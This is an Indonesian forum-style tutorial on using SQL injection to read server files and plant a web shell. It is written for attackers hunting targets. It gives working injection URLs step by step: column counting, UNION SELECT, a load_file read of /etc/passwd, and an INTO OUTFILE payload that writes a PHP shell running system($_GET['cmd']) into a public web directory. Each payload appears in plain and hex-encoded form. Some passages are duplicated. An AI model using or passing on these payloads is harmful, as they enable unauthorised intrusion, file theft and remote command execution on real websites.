Pernah kesel gk gan kalo abis sqli trus gk nemu login pagenya ? walau udh pake finder finder-an 
... Mungkin post ini solusinya 
, nah disini gw bakal share tutor write shell via sqli. Langsung aja
... Mungkin post ini solusinya , nah disini gw bakal share tutor write shell via sqli. Langsung aja
Alat:
1.Hackbar modded version (Opsional, hanya untuk mempermudah dan mempercepat)
2.Hex encoder (Tidak usah jika sudah ada Hackbar)
Step:
1.Cek target apakah vuln sqli2.Disini target saya seperti inihttps://target.org/file.php?id=13.Lakukan inject seperti biasa,https://target.org/file.php?id=1'(Jika ada error mysql berarti vuln sqli)4.Cek kolom,https://target.org/file.php?id=1' order by 1--+(Disini gw dapat error di 16, berarti kolomnya 15)5.Lakukan union select,https://target.org/file.php?id=1'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+(Karna kolom target gw 15)6.Nah, sekarang coba kita load file /etc/passwdNON HEXhttps://target.org/file.php?id=1'+UNION+ALL+SELECT+1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15--+HEXhttps://target.org/file.php?id=1'+UNION+ALL+SELECT+1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8,9,10,11,12,13,14,15--+7.Kalau keluar isi passwdnya maka target bisa write/upload shell dengan sqli (Kalau gk keluar skip aja / next target)8.Lanjut untuk write shellnyaNON HEXhttps://target.org/file.php?id=1'+UNION+ALL+SELECT+1,2,3,4,"<? system($_GET['cmd']); ?>",6,7,8,9,10,11,12,13,14,15 INTO OUTFILE "/home/user/public_html/writeabledir/namafile.php"--+HEXhttps://target.org/file.php?id=1'+UNION+ALL+SELECT+1,2,3,4,0x3c3f2073797374656d28245f4745545b27636d64275d293b203f3e,6,7,8,9,10,11,12,13,14,15 INTO OUTFILE "/home/user/public_html/writeabledir/namafile.php"--+9.Lalu coba akses file tsb, btw ini hasil gwKalau udah begitu, terserah agan mau diapain
*Untuk user website, agan bisa mengetahui dari ini
Lebih lanjut:
- /home/user/public_html/writeabledir/namafile.php (Bisa agan ganti sesuai username, lokasi dirnya, dan namafile shellnya) contoh
- Versi DB target gw
CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())Lebih lanjut:
- /home/user/public_html/writeabledir/namafile.php (Bisa agan ganti sesuai username, lokasi dirnya, dan namafile shellnya) contoh
/home/weborangco/public_html/site/x.php- Versi DB target gw
5.5.43-0ubuntu0.12.04.1
Thanks.
-AhhzayShh